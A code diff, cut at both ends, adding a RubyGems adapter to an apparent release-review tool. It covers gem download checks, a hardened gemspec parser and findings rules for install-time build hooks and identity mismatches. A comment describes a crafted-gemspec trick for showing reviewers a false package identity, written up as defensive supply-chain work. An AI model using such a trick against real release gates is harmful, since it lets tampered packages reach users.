+export interface RubyGemsBrokerDownloadOptions {
+  maxFiles?: number;
+}
+
+export interface RubyGemsBroker extends AdapterBroker {
+  fetchGemVersions(gemName: string): Promise<RubyGemsVersion[] | null>;
+  downloadPublicGem(url: string, opts?: RubyGemsBrokerDownloadOptions): Promise<DownloadResult>;
+}
+
+const RUBYGEMS_API = "https://rubygems.org/api/v1";
+
+export function isAllowedRubyGemsArtifactUrl(url: string): boolean {
+  try {
+    const parsed = new URL(url);
+    return (
+      parsed.protocol === "https:" &&
+      parsed.hostname === "rubygems.org" &&
+      parsed.pathname.startsWith("/downloads/")
+    );
+  } catch {
+    return false;
+  }
+}
+
+// rubygems.org gem downloads carry no credentials, so — like the PyPI broker —
+// this is a plain object rather than a credentialed WorkerEntrypoint, and the
+// sandbox download path is imported dynamically so node-env logic tests can load
+// this module without pulling in `cloudflare:workers`.
+export function createRubyGemsBroker(
+  ctx: AdapterContext,
+  _ref: AdapterConnectionRef,
+): RubyGemsBroker {
+  return {
+    async fetchGemVersions(gemName: string): Promise<RubyGemsVersion[] | null> {
+      try {
+        const res = await fetch(`${RUBYGEMS_API}/versions/${encodeURIComponent(gemName)}.json`, {
+          headers: { accept: "application/json" },
+        });
+        if (!res.ok) return null;
+        const body = (await res.json()) as unknown;
+        return Array.isArray(body) ? (body as RubyGemsVersion[]) : null;
+      } catch {
+        return null;
+      }
+    },
+
+    async downloadPublicGem(
+      url: string,
+      opts?: RubyGemsBrokerDownloadOptions,
+    ): Promise<DownloadResult> {
+      if (!isAllowedRubyGemsArtifactUrl(url)) {
+        throw new Error("rubygems public artifact URL is not allowed");
+      }
+      const { downloadInSandbox } = await import("../../sandbox");
+      // No npm token is passed: the gateway sees only this single pinned URL on
+      // its public-artifact allowlist, so it forwards the request uncredentialed.
+      return downloadInSandbox(ctx.env, ctx.executionCtx, {
+        tarballUrl: url,
+        archiveFormat: "gem",
+        publicArtifactUrls: [url],
+        maxFiles: opts?.maxFiles,
+      });
+    },
+
+    dispose(): void {},
+  };
+}

--- a/server/lib/adapters/rubygems/findings.ts
+++ b/server/lib/adapters/rubygems/findings.ts
@@ -1,0 +1,126 @@
+import { type Finding, RUBY_EXECUTION_CAPABILITY_PATTERNS } from "../../review";
+import { firstMatchingLine } from "../../text-utils";
+import { normalizeGemName } from "./manifest";
+import {
+  RUBYGEMS_RULE_IDS,
+  RUBYGEMS_RULES_VERSION,
+  type RubyGemsPreparedArtifact,
+  type RubyGemsReleaseManifest,
+} from "./types";
+
+// `gem push` honours a gemspec's `allowed_push_host`; for a gate that exists to
+// review rubygems.org releases, any other host is worth surfacing.
+const EXPECTED_PUSH_HOST = "https://rubygems.org";
+
+export function rubyGemsReleaseFindings(
+  manifest: RubyGemsReleaseManifest,
+  artifacts: RubyGemsPreparedArtifact[],
+): Finding[] {
+  const findings: Finding[] = [];
+  const manifestName = normalizeGemName(manifest.package);
+
+  for (const artifact of artifacts) {
+    const { summary } = artifact;
+    const specEvidence = `${artifact.path} (gemspec)`;
+
+    if (!summary.hasGemspec || !summary.name || !summary.version) {
+      findings.push(
+        tag("metadataMissing", {
+          severity: "medium",
+          file: specEvidence,
+          evidence: `${artifact.path} does not expose a complete Gem::Specification (name/version)`,
+          reason:
+            "release gates need the gem name and version from metadata.gz to prove the artifact matches the reviewed manifest",
+        }),
+      );
+    } else {
+      if (normalizeGemName(summary.name) !== manifestName) {
+        findings.push(
+          tag("metadataMismatch", {
+            severity: "critical",
+            file: specEvidence,
+            evidence: `${artifact.path} gemspec name ${summary.name} != manifest package ${manifest.package}`,
+            reason: "the release artifact gem name does not match the reviewed manifest",
+          }),
+        );
+      }
+      if (summary.version !== manifest.version) {
+        findings.push(
+          tag("metadataMismatch", {
+            severity: "critical",
+            file: specEvidence,
+            evidence: `${artifact.path} gemspec version ${summary.version} != manifest version ${manifest.version}`,
+            reason: "the release artifact gem version does not match the reviewed manifest",
+          }),
+        );
+      }
+    }
+
+    if (summary.extensions.length) {
+      findings.push(
+        tag("nativeExtension", {
+          severity: "medium",
+          file: namespacedPath(artifact.path, summary.extensions[0]),
+          evidence: `gemspec declares native extensions: ${summary.extensions.join(", ")}`,
+          reason:
+            "a gem with native extensions runs its build scripts (extconf.rb/Rakefile/Makefile) during `gem install`, executing code on the consumer machine",
+        }),
+      );
+    }
+
+    // RubyGems executes every path declared in `extensions`; most gems use an
+    // `ext/` extconf.rb, but configure scripts and root-level build files are
+    // equally install-time code when the gemspec lists them.
+    const extensionPaths = new Set(summary.extensions.map(normalizeExtensionPath));
+    for (const file of artifact.files) {
+      if (!extensionPaths.has(normalizeExtensionPath(file.path))) continue;
+      const sample = file.textSample ?? "";
+      if (RUBY_EXECUTION_CAPABILITY_PATTERNS.some((pattern) => pattern.test(sample))) {
+        findings.push(
+          tag("extensionBuildHook", {
+            severity: "high",
+            file: namespacedPath(artifact.path, file.path),
+            line: firstMatchingLine(sample, RUBY_EXECUTION_CAPABILITY_PATTERNS),
+            evidence: `${file.path.split("/").at(-1)} runs process/network/eval code at gem-install time`,
+            reason:
+              "`gem install` runs a native extension's build script, so process, network, or dynamic-eval code there executes on the consumer machine",
+          }),
+        );
+      }
+    }
+
+    const pushHost = summary.metadata.allowed_push_host;
+    if (pushHost && pushHost !== EXPECTED_PUSH_HOST) {
+      findings.push(
+        tag("unexpectedPushHost", {
+          severity: "low",
+          file: specEvidence,
+          evidence: `gemspec metadata.allowed_push_host is ${pushHost}`,
+          reason:
+            "the gem restricts pushes to a host other than rubygems.org; confirm the release is meant for this registry",
+        }),
+      );
+    }
+  }
+
+  return findings;
+}
+
+export function namespacedPath(artifactPath: string, filePath: string): string {
+  return `${artifactPath.replace(/\/+$/, "")}/${filePath.replace(/^\/+/, "")}`;
+}
+
+function normalizeExtensionPath(path: string): string {
+  return path.replace(/^\.\//, "").replace(/^\/+/, "");
+}
+
+function tag(
+  rule: keyof typeof RUBYGEMS_RULE_IDS,
+  finding: Omit<Finding, "ruleId" | "ruleVersion">,
+): Finding {
+  return {
+    ...finding,
+    ruleId: RUBYGEMS_RULE_IDS[rule],
+    ruleVersion: RUBYGEMS_RULES_VERSION,
+  };
+}

--- a/server/lib/adapters/rubygems/gemspec.ts
+++ b/server/lib/adapters/rubygems/gemspec.ts
@@ -1,0 +1,218 @@
+// Focused parser for `Gem::Specification#to_yaml` (Psych) output, the YAML that
+// ships inside a `.gem`'s `metadata.gz` member. We deliberately do NOT pull in a
+// general YAML library: the gemspec layout is highly regular and entirely
+// attacker-controlled, so a small, defensive, line-oriented reader that only
+// understands the handful of shapes Psych emits is both safer and lets us keep
+// running in the credentials-free sandbox's constrained globals if needed. Every
+// field degrades to null/[] on an unexpected shape rather than throwing, so a
+// malformed gemspec surfaces as `metadata-missing` (a finding) instead of a
+// pipeline crash.
+
+export interface GemspecDependency {
+  name: string;
+  /** Ruby dependency type symbol without the leading colon: "runtime" | "development" | other. */
+  type: string;
+}
+
+export interface GemspecSummary {
+  name: string | null;
+  version: string | null;
+  /** "ruby" for a pure-ruby gem, otherwise a platform tag like "x86_64-linux". */
+  platform: string | null;
+  bindir: string | null;
+  homepage: string | null;
+  executables: string[];
+  extensions: string[];
+  requirePaths: string[];
+  licenses: string[];
+  /** Free-form system requirements (`spec.requirements`), e.g. "libmagic". */
+  requirements: string[];
+  /** Best-effort rendering of `required_ruby_version`, e.g. ">= 2.7.0". */
+  requiredRubyVersion: string | null;
+  dependencies: GemspecDependency[];
+  /** The gemspec `metadata` hash (allowed_push_host, *_uri, …). */
+  metadata: Record<string, string>;
+}
+
+interface TopLevelBlock {
+  inline: string | null;
+  body: string[];
+}
+
+// A document-root mapping key: an identifier at column 0 followed by `:`.
+// Nested mapping keys (indented) and sequence items (`- …`) never match, so they
+// stay attached to the preceding top-level key's block.
+const TOP_KEY_RE = /^([A-Za-z_][A-Za-z0-9_]*):(?:[ \t]+(.*))?$/;
+
+export function emptyGemspecSummary(): GemspecSummary {
+  return {
+    name: null,
+    version: null,
+    platform: null,
+    bindir: null,
+    homepage: null,
+    executables: [],
+    extensions: [],
+    requirePaths: [],
+    licenses: [],
+    requirements: [],
+    requiredRubyVersion: null,
+    dependencies: [],
+    metadata: {},
+  };
+}
+
+export function parseGemspecMetadata(yaml: string | null | undefined): GemspecSummary {
+  const summary = emptyGemspecSummary();
+  if (!yaml || typeof yaml !== "string") return summary;
+
+  const blocks = collectTopLevelBlocks(yaml);
+
+  summary.name = scalar(blocks.get("name")?.inline);
+  summary.platform = scalar(blocks.get("platform")?.inline);
+  summary.bindir = scalar(blocks.get("bindir")?.inline);
+  summary.homepage = scalar(blocks.get("homepage")?.inline);
+  summary.version = parseGemVersion(blocks.get("version"));
+  summary.executables = parseScalarList(blocks.get("executables"));
+  summary.extensions = parseScalarList(blocks.get("extensions"));
+  summary.requirePaths = parseScalarList(blocks.get("require_paths"));
+  summary.licenses = parseScalarList(blocks.get("licenses"));
+  summary.requirements = parseScalarList(blocks.get("requirements"));
+  summary.dependencies = parseDependencies(blocks.get("dependencies"));
+  summary.metadata = parseMetadataMap(blocks.get("metadata"));
+  summary.requiredRubyVersion = parseRequirement(blocks.get("required_ruby_version"));
+
+  return summary;
+}
+
+function collectTopLevelBlocks(yaml: string): Map<string, TopLevelBlock> {
+  const blocks = new Map<string, TopLevelBlock>();
+  let current: TopLevelBlock | null = null;
+  for (const line of yaml.replace(/\r\n/g, "\n").split("\n")) {
+    if (line === "---" || line.startsWith("--- ") || line.startsWith("...")) continue;
+    const match = TOP_KEY_RE.exec(line);
+    if (match) {
+      current = { inline: match[2] !== undefined ? match[2] : null, body: [] };
+      // Last write wins; a duplicate top-level key in a crafted spec keeps the
+      // later value, matching Psych's own last-key-wins mapping behavior.
+      blocks.set(match[1], current);
+    } else if (current) {
+      current.body.push(line);
+    }
+  }
+  return blocks;
+}
+
+// Unwrap a Psych scalar: trim, drop a bare type tag (`!ruby/object:…`), and
+// remove the single/double quotes Psych adds around values that need them.
+function scalar(raw: string | null | undefined): string | null {
+  if (raw == null) return null;
+  const trimmed = raw.trim();
+  if (!trimmed || trimmed.startsWith("!")) return null;
+  if (trimmed.startsWith('"') && trimmed.endsWith('"') && trimmed.length >= 2) {
+    return trimmed.slice(1, -1).replace(/\\"/g, '"').replace(/\\\\/g, "\\") || null;
+  }
+  if (trimmed.startsWith("'") && trimmed.endsWith("'") && trimmed.length >= 2) {
+    return trimmed.slice(1, -1).replace(/''/g, "'") || null;
+  }
+  return trimmed || null;
+}
+
+// `version` is a `!ruby/object:Gem::Version` whose scalar lives on a nested
+// `version:` line; tolerate an inline scalar too for hand-written specs.
+function parseGemVersion(block: TopLevelBlock | undefined): string | null {
+  if (!block) return null;
+  const inline = scalar(block.inline);
+  if (inline) return inline;
+  for (const line of block.body) {
+    const match = /^\s+version:\s*(.+)$/.exec(line);
+    if (match) return scalar(match[1]);
+  }
+  return null;
+}
+
+// A block sequence of scalars at the document root (`- item` lines at column 0).
+// Empty lists render inline as `[]`.
+function parseScalarList(block: TopLevelBlock | undefined): string[] {
+  if (!block) return [];
+  if (block.inline && block.inline.trim() === "[]") return [];
+  const items: string[] = [];
+  for (const line of block.body) {
+    const match = /^- (.+)$/.exec(line);
+    if (match) {
+      const value = scalar(match[1]);
+      if (value) items.push(value);
+    }
+  }
+  return items;
+}
+
+// Each dependency is a `- !ruby/object:Gem::Dependency` item (new item at column
+// 0) with indented `name:`/`type:` lines. We capture only name + type; the
+// nested `requirement:`/`version_requirements:` blocks are intentionally ignored.
+function parseDependencies(block: TopLevelBlock | undefined): GemspecDependency[] {
+  if (!block) return [];
+  const deps: GemspecDependency[] = [];
+  let current: { name: string | null; type: string | null } | null = null;
+  const flush = () => {
+    if (current?.name) deps.push({ name: current.name, type: current.type ?? "runtime" });
+  };
+  for (const line of block.body) {
+    if (line.startsWith("- ")) {
+      flush();
+      current = { name: null, type: null };
+      continue;
+    }
+    if (!current) continue;
+    const nameMatch = /^\s+name:\s*(.+)$/.exec(line);
+    if (nameMatch) {
+      current.name = scalar(nameMatch[1]);
+      continue;
+    }
+    const typeMatch = /^\s+type:\s*(.+)$/.exec(line);
+    if (typeMatch) current.type = normalizeSymbol(scalar(typeMatch[1]));
+  }
+  flush();
+  return deps;
+}
+
+function parseMetadataMap(block: TopLevelBlock | undefined): Record<string, string> {
+  if (!block) return {};
+  const out: Record<string, string> = {};
+  for (const line of block.body) {
+    const match = /^\s+([A-Za-z0-9_.-]+):\s*(.*)$/.exec(line);
+    if (!match) continue;
+    const value = scalar(match[2]);
+    if (value !== null) out[match[1]] = value;
+  }
+  return out;
+}
+
+// `required_ruby_version` is a `Gem::Requirement` whose constraints are
+// `[operator, version]` pairs; render them as "<op> <version>" joined by ", ".
+function parseRequirement(block: TopLevelBlock | undefined): string | null {
+  if (!block) return null;
+  const operators: string[] = [];
+  const versions: string[] = [];
+  for (const line of block.body) {
+    const opMatch = /^\s+-\s+-\s+(.+)$/.exec(line);
+    if (opMatch) {
+      const op = scalar(opMatch[1]);
+      if (op) operators.push(op);
+      continue;
+    }
+    const versionMatch = /^\s+version:\s*(.+)$/.exec(line);
+    if (versionMatch) {
+      const version = scalar(versionMatch[1]);
+      if (version) versions.push(version);
+    }
+  }
+  if (!operators.length) return null;
+  const parts = operators.map((op, index) => (versions[index] ? `${op} ${versions[index]}` : op));
+  return parts.join(", ") || null;
+}
+
+function normalizeSymbol(value: string | null): string | null {
+  if (!value) return null;
+  return value.startsWith(":") ? value.slice(1) : value;
+}

--- a/server/lib/adapters/rubygems/gemspec.ts
+++ b/server/lib/adapters/rubygems/gemspec.ts
@@ -67,6 +67,7 @@ export function parseGemspecMetadata(yaml: string | null | undefined): GemspecSu
   if (!yaml || typeof yaml !== "string") return summary;
 
   const blocks = collectTopLevelBlocks(yaml);
+  if (!blocks) return summary;
 
   summary.name = scalar(blocks.get("name")?.inline);
   summary.platform = scalar(blocks.get("platform")?.inline);
@@ -85,20 +86,36 @@ export function parseGemspecMetadata(yaml: string | null | undefined): GemspecSu
   return summary;
 }
 
-function collectTopLevelBlocks(yaml: string): Map<string, TopLevelBlock> {
+// Returns null when the document contains a root-level construct this parser
+// does not model but Psych does — quoted or escaped mapping keys, explicit
+// `? key` syntax, directives, or a second YAML document. Psych applies
+// last-key-wins across key spellings and reads only the first document, so
+// silently skipping such a line would let a crafted spec show this parser one
+// identity while `gem push` publishes under another. Psych's own
+// Gem::Specification output never emits these shapes, so real gems are
+// unaffected and a crafted one degrades to a missing identity (fail closed).
+function collectTopLevelBlocks(yaml: string): Map<string, TopLevelBlock> | null {
   const blocks = new Map<string, TopLevelBlock>();
   let current: TopLevelBlock | null = null;
   for (const line of yaml.replace(/\r\n/g, "\n").split("\n")) {
-    if (line === "---" || line.startsWith("--- ") || line.startsWith("...")) continue;
+    if (line === "---" || line.startsWith("--- ") || line.startsWith("...")) {
+      // A marker is only valid as the document opener; after content it starts
+      // a second document, which Psych would ignore but we would keep reading.
+      if (blocks.size > 0 || current) return null;
+      continue;
+    }
     const match = TOP_KEY_RE.exec(line);
     if (match) {
       current = { inline: match[2] !== undefined ? match[2] : null, body: [] };
       // Last write wins; a duplicate top-level key in a crafted spec keeps the
       // later value, matching Psych's own last-key-wins mapping behavior.
       blocks.set(match[1], current);
-    } else if (current) {
-      current.body.push(line);
+      continue;
     }
+    // Root-level lines that are neither a bare key, a sequence item, blank,
+    // nor indented continuation are the unmodeled-key shapes described above.
+    if (line && !/^[ \t]/.test(line) && !/^-(?: |$)/.test(line)) return null;
+    if (current) current.body.push(line);
   }
   return blocks;
 }

--- a/server/lib/adapters/rubygems/index.ts
+++ b/server/lib/adapters/rubygems/index.ts
@@ -6,7 +6,7 @@ import {
   summarizePackageJsonDiff,
   tarSuspiciousEntryFindings,
 } from "../../review";
-import type { PackageAdapter } from "../types";
+import type { PackageAdapter, ReleaseProvenance } from "../types";
 import {
   acquireBaselineRubyGems,
   acquireStagedRubyGems,
@@ -72,6 +72,18 @@ export const rubygemsAdapter: PackageAdapter<RubyGemsAdapterInput, RubyGemsBroke
       ecosystem: "rubygems",
       manifest: d.manifest,
       artifacts: d.artifacts,
+      provenance: {
+        // Gems only reach review through the workflow gate; the manifest carries
+        // each `.gem` digest recomputed from the immutable bundle bytes, which
+        // the publish job re-verifies before `gem push`.
+        ecosystem: "rubygems",
+        mode: "workflow_gate",
+        artifacts: d.manifest.artifacts.map((artifact) => ({
+          path: artifact.path,
+          kind: "gem" as const,
+          sha256: artifact.sha256,
+        })),
+      } satisfies ReleaseProvenance,
     };
   },
 };

--- a/server/lib/adapters/rubygems/index.ts
+++ b/server/lib/adapters/rubygems/index.ts
@@ -1,0 +1,160 @@
+import {
+  computeRisk,
+  createPackageDiff,
+  deterministicFindings,
+  redactFindings,
+  summarizePackageJsonDiff,
+  tarSuspiciousEntryFindings,
+} from "../../review";
+import type { PackageAdapter } from "../types";
+import {
+  acquireBaselineRubyGems,
+  acquireStagedRubyGems,
+  baselineFromPreviousArtifacts,
+  pickPackageIdentity,
+} from "./acquire";
+import { createRubyGemsBroker, type RubyGemsBroker } from "./broker";
+import { rubyGemsReleaseFindings } from "./findings";
+import { parseRubyGemsAdapterInput } from "./manifest";
+import type {
+  RubyGemsAdapterDetails,
+  RubyGemsAdapterInput,
+  RubyGemsArtifactInput,
+  RubyGemsReleaseCandidateReview,
+  RubyGemsReleaseManifest,
+} from "./types";
+
+export const rubygemsAdapter: PackageAdapter<RubyGemsAdapterInput, RubyGemsBroker> = {
+  id: "rubygems",
+  codePatternSet: "ruby",
+
+  parseInput(raw: unknown): RubyGemsAdapterInput {
+    return parseRubyGemsAdapterInput(raw);
+  },
+
+  createBroker(ctx, ref) {
+    return createRubyGemsBroker(ctx, ref);
+  },
+
+  async acquireStaged(_ctx, input, _broker) {
+    return acquireStagedRubyGems(input);
+  },
+
+  async acquireBaseline(ctx, input, broker, staged) {
+    return acquireBaselineRubyGems(ctx, input, broker, staged);
+  },
+
+  runFindings(args) {
+    const details = args.details as RubyGemsAdapterDetails;
+    return [
+      ...deterministicFindings(args.staged.files, args.fileDiff, null, {
+        codePatternSet: "ruby",
+      }),
+      ...rubyGemsReleaseFindings(details.manifest, details.preparedArtifacts),
+      ...tarSuspiciousEntryFindings(args.staged.suspiciousTarEntries),
+    ];
+  },
+
+  describe({ details, previous }) {
+    const d = details as RubyGemsAdapterDetails;
+    const identity = pickPackageIdentity(d.manifest, d.preparedArtifacts);
+    return {
+      name: identity.name,
+      stagedVersion: identity.version,
+      stagedTag: null,
+      previousVersion: previous?.manifest?.version ?? null,
+    };
+  },
+
+  summarizeDetails(details) {
+    const d = details as RubyGemsAdapterDetails;
+    return {
+      ecosystem: "rubygems",
+      manifest: d.manifest,
+      artifacts: d.artifacts,
+    };
+  },
+};
+
+export function createRubyGemsReleaseCandidateReview(input: {
+  manifest: RubyGemsReleaseManifest;
+  artifacts: RubyGemsArtifactInput[];
+  previousArtifacts?: RubyGemsArtifactInput[];
+}): RubyGemsReleaseCandidateReview {
+  const adapterInput = rubygemsAdapter.parseInput(input);
+  const staged = acquireStagedRubyGems(adapterInput);
+  const baseline = baselineFromPreviousArtifacts(adapterInput);
+  const diff = createPackageDiff(baseline.artifact?.files ?? [], staged.artifact.files);
+  const ruleFindings = redactFindings(
+    rubygemsAdapter.runFindings({
+      staged: staged.artifact,
+      baseline: baseline.artifact,
+      details: staged.details,
+      fileDiff: diff,
+      manifestDiff: summarizePackageJsonDiff(baseline.artifact?.manifest, staged.artifact.manifest),
+      stagedManifestText: null,
+    }),
+  );
+  const packageIdentity = rubygemsAdapter.describe({
+    input: adapterInput,
+    staged: staged.artifact,
+    details: staged.details,
+    baseline: baseline.baseline,
+    previous: baseline.artifact,
+  });
+  const details = staged.details as RubyGemsAdapterDetails;
+
+  return {
+    ecosystem: "rubygems",
+    manifest: adapterInput.manifest,
+    package: {
+      name: packageIdentity.name,
+      version: packageIdentity.stagedVersion,
+    },
+    artifactCount: details.preparedArtifacts.length,
+    fileCount: staged.artifact.files.length,
+    previousFileCount: baseline.artifact?.files.length ?? 0,
+    artifacts: details.artifacts,
+    diff,
+    ruleFindings,
+    risk: computeRisk(ruleFindings),
+  };
+}
+
+export {
+  RUBYGEMS_RELEASE_MANIFEST_SCHEMA,
+  RUBYGEMS_RULE_IDS,
+  RUBYGEMS_RULES_VERSION,
+} from "./types";
+export type {
+  GemArtifactSummary,
+  RubyGemsAdapterDetails,
+  RubyGemsAdapterInput,
+  RubyGemsArtifactInput,
+  RubyGemsBaselineSelection,
+  RubyGemsBaselineSelectionSource,
+  RubyGemsPreparedArtifact,
+  RubyGemsReleaseCandidateReview,
+  RubyGemsReleaseManifest,
+  RubyGemsReleaseManifestArtifact,
+  RubyGemsRemoteArtifact,
+  RubyGemsVersion,
+} from "./types";
+export type { GemspecDependency, GemspecSummary } from "./gemspec";
+export { parseGemspecMetadata } from "./gemspec";
+export {
+  isValidGemName,
+  isValidGemVersion,
+  normalizeGemName,
+  parseRubyGemsAdapterInput,
+  parseRubyGemsReleaseManifest,
+} from "./manifest";
+export {
+  acquireBaselineRubyGems,
+  acquireStagedRubyGems,
+  baselineFromPreviousArtifacts,
+  pickPackageIdentity,
+  pickRubyGemsBaselineVersion,
+  prepareRubyGemsArtifact,
+} from "./acquire";
+export { isAllowedRubyGemsArtifactUrl } from "./broker";

--- a/server/lib/adapters/rubygems/manifest.ts
+++ b/server/lib/adapters/rubygems/manifest.ts
@@ -1,0 +1,153 @@
+import type { FileRecord } from "../../review";
+import {
+  GEM_NAME_RE,
+  GEM_VERSION_RE,
+  RUBYGEMS_ARTIFACT_LIMIT,
+  RUBYGEMS_RELEASE_MANIFEST_SCHEMA,
+  type RubyGemsAdapterInput,
+  type RubyGemsArtifactInput,
+  type RubyGemsReleaseManifest,
+  type RubyGemsVersion,
+  SHA256_RE,
+} from "./types";
+
+// RubyGems treats names case-sensitively for resolution but the registry index
+// is effectively case-insensitive; normalize to lowercase only for grouping
+// equality so two `.gem` files that disagree only in case are still one package.
+export function normalizeGemName(name: string): string {
+  return name.toLowerCase();
+}
+
+export function isValidGemName(name: string): boolean {
+  return (
+    typeof name === "string" && name.length > 0 && name.length <= 100 && GEM_NAME_RE.test(name)
+  );
+}
+
+export function isValidGemVersion(version: string): boolean {
+  return typeof version === "string" && GEM_VERSION_RE.test(version);
+}
+
+export function parseRubyGemsReleaseManifest(value: unknown): RubyGemsReleaseManifest {
+  if (!isRecord(value)) throw new Error("manifest must be an object");
+  if (value.schema !== RUBYGEMS_RELEASE_MANIFEST_SCHEMA) {
+    throw new Error(`manifest schema must be ${RUBYGEMS_RELEASE_MANIFEST_SCHEMA}`);
+  }
+  if (value.ecosystem !== "rubygems") throw new Error("manifest ecosystem must be rubygems");
+  const packageName = String(value.package || "");
+  const version = String(value.version || "");
+  if (!isValidGemName(packageName)) throw new Error("manifest package is not a valid gem name");
+  if (!isValidGemVersion(version)) throw new Error("manifest version is not a safe gem version");
+  if (!Array.isArray(value.artifacts) || !value.artifacts.length) {
+    throw new Error("manifest must include at least one artifact");
+  }
+  if (value.artifacts.length > RUBYGEMS_ARTIFACT_LIMIT) {
+    throw new Error(`manifest must include no more than ${RUBYGEMS_ARTIFACT_LIMIT} artifacts`);
+  }
+
+  const artifacts = value.artifacts.map((artifact, index) => {
+    if (!isRecord(artifact)) throw new Error(`artifact ${index + 1} must be an object`);
+    const path = String(artifact.path || "");
+    if (!isSafeManifestPath(path)) throw new Error(`artifact ${index + 1} path is not safe`);
+    if (!path.toLowerCase().endsWith(".gem"))
+      throw new Error(`artifact ${index + 1} must be a .gem`);
+    const sha256 = String(artifact.sha256 || "");
+    if (!SHA256_RE.test(sha256)) {
+      throw new Error(`artifact ${index + 1} sha256 must be a hex SHA-256 digest`);
+    }
+    const url = typeof artifact.url === "string" && artifact.url ? artifact.url : undefined;
+    if (url && !isSafeHttpsUrl(url)) throw new Error(`artifact ${index + 1} url must be https`);
+    return { path, sha256: sha256.toLowerCase(), url };
+  });
+
+  return {
+    schema: RUBYGEMS_RELEASE_MANIFEST_SCHEMA,
+    ecosystem: "rubygems",
+    package: packageName,
+    version,
+    artifacts,
+  };
+}
+
+export function parseRubyGemsAdapterInput(raw: unknown): RubyGemsAdapterInput {
+  if (!isRecord(raw)) throw new Error("rubygems adapter input must be an object");
+  const manifest = parseRubyGemsReleaseManifest(raw.manifest ?? raw);
+  return {
+    manifest,
+    artifacts: parseRubyGemsArtifactInputs(raw.artifacts, "artifacts"),
+    previousArtifacts:
+      raw.previousArtifacts === undefined
+        ? undefined
+        : parseRubyGemsArtifactInputs(raw.previousArtifacts, "previousArtifacts"),
+    versions: Array.isArray(raw.versions) ? (raw.versions as RubyGemsVersion[]) : undefined,
+  };
+}
+
+function parseRubyGemsArtifactInputs(raw: unknown, field: string): RubyGemsArtifactInput[] {
+  if (!Array.isArray(raw) || !raw.length) {
+    throw new Error(`rubygems adapter input must include ${field}`);
+  }
+  return raw.map((artifact, index) => {
+    if (!isRecord(artifact)) throw new Error(`${field}[${index}] must be an object`);
+    const path = typeof artifact.path === "string" ? artifact.path : "";
+    if (!isSafeManifestPath(path)) throw new Error(`${field}[${index}] path is not safe`);
+    if (!Array.isArray(artifact.files))
+      throw new Error(`${field}[${index}] files must be an array`);
+    return {
+      path,
+      gemMetadata: typeof artifact.gemMetadata === "string" ? artifact.gemMetadata : null,
+      ...(Array.isArray(artifact.suspiciousEntries)
+        ? {
+            suspiciousEntries:
+              artifact.suspiciousEntries as RubyGemsArtifactInput["suspiciousEntries"],
+          }
+        : {}),
+      files: artifact.files.map((file, fileIndex) =>
+        parseFileRecord(file, field, index, fileIndex),
+      ),
+    };
+  });
+}
+
+function parseFileRecord(
+  raw: unknown,
+  field: string,
+  artifactIndex: number,
+  fileIndex: number,
+): FileRecord {
+  if (!isRecord(raw)) {
+    throw new Error(`${field}[${artifactIndex}].files[${fileIndex}] must be an object`);
+  }
+  const path = typeof raw.path === "string" ? raw.path : "";
+  const size = typeof raw.size === "number" ? raw.size : 0;
+  const sha256 = typeof raw.sha256 === "string" ? raw.sha256 : "";
+  const flags = Array.isArray(raw.flags)
+    ? raw.flags.filter((flag): flag is string => typeof flag === "string")
+    : [];
+  return {
+    path,
+    size,
+    sha256,
+    flags,
+    ...(typeof raw.textSample === "string" ? { textSample: raw.textSample } : {}),
+  };
+}
+
+export function isRecord(value: unknown): value is Record<string, unknown> {
+  return typeof value === "object" && value !== null && !Array.isArray(value);
+}
+
+function isSafeManifestPath(path: string): boolean {
+  if (!path || path.length > 512 || path.includes("\0") || path.includes("\\")) return false;
+  if (path.startsWith("/") || path.startsWith("../") || path.includes("/../")) return false;
+  if (/^[A-Za-z]:/.test(path)) return false;
+  return path.split("/").every((part) => part && part !== "." && part !== "..");
+}
+
+function isSafeHttpsUrl(url: string): boolean {
+  try {
+    return new URL(url).protocol === "https:";
+  } catch {
+    return false;
+  }
+}

--- a/server/lib/adapters/rubygems/types.ts
+++ b/server/lib/adapters/rubygems/types.ts
@@ -1,0 +1,128 @@
+import type { DiffEntry, FileRecord, Finding, RiskLevel } from "../../review";
+import type { TarSuspiciousEntry } from "../../tar-parser.js";
+import type { GemspecDependency } from "./gemspec";
+
+// Shared cross-ecosystem release-manifest schema (npm/PyPI use the same string);
+// the `ecosystem` discriminator is what distinguishes a rubygems manifest.
+export const RUBYGEMS_RELEASE_MANIFEST_SCHEMA = "drydock.release-artifacts.v1";
+export const RUBYGEMS_RULES_VERSION = "0.1.0";
+
+export const RUBYGEMS_RULE_IDS = {
+  metadataMissing: "rubygems.metadata-missing",
+  metadataMismatch: "rubygems.metadata-mismatch",
+  nativeExtension: "rubygems.native-extension",
+  extensionBuildHook: "rubygems.extension-build-hook",
+  unexpectedPushHost: "rubygems.unexpected-push-host",
+} as const;
+
+// Gem names: a letter/digit start, then letters/digits/`._-`. RubyGems also caps
+// the length; 100 mirrors our repo full-name caps and is well above any real gem.
+export const GEM_NAME_RE = /^[A-Za-z0-9](?:[A-Za-z0-9._-]*[A-Za-z0-9])?$/;
+// Gem::Version always starts with a digit; the rest is digits, dots, and
+// pre-release segments (e.g. `1.2.0.pre.1`).
+export const GEM_VERSION_RE = /^[0-9][0-9A-Za-z._-]{0,127}$/;
+export const SHA256_RE = /^[a-f0-9]{64}$/i;
+export const RUBYGEMS_ARTIFACT_LIMIT = 20;
+
+// A reviewable `.gem` after the shared sandbox parse: the installed files plus
+// the raw Gem::Specification YAML from the gem's `metadata.gz` member.
+export interface RubyGemsArtifactInput {
+  path: string;
+  files: FileRecord[];
+  gemMetadata: string | null;
+  suspiciousEntries?: TarSuspiciousEntry[];
+}
+
+export interface RubyGemsReleaseManifestArtifact {
+  path: string;
+  sha256: string;
+  url?: string;
+}
+
+export interface RubyGemsReleaseManifest {
+  schema: typeof RUBYGEMS_RELEASE_MANIFEST_SCHEMA;
+  ecosystem: "rubygems";
+  package: string;
+  version: string;
+  artifacts: RubyGemsReleaseManifestArtifact[];
+}
+
+// Persisted-safe summary of one `.gem`'s gemspec (the volatile `files`/`date`/
+// `rubygems_version` fields are deliberately dropped).
+export interface GemArtifactSummary {
+  path: string;
+  platform: string;
+  name: string | null;
+  version: string | null;
+  bindir: string | null;
+  executables: string[];
+  extensions: string[];
+  requirePaths: string[];
+  licenses: string[];
+  requirements: string[];
+  requiredRubyVersion: string | null;
+  dependencies: GemspecDependency[];
+  metadata: Record<string, string>;
+  hasGemspec: boolean;
+}
+
+export interface RubyGemsPreparedArtifact extends RubyGemsArtifactInput {
+  platform: string;
+  summary: GemArtifactSummary;
+}
+
+export interface RubyGemsReleaseCandidateReview {
+  ecosystem: "rubygems";
+  manifest: RubyGemsReleaseManifest;
+  package: {
+    name: string | null;
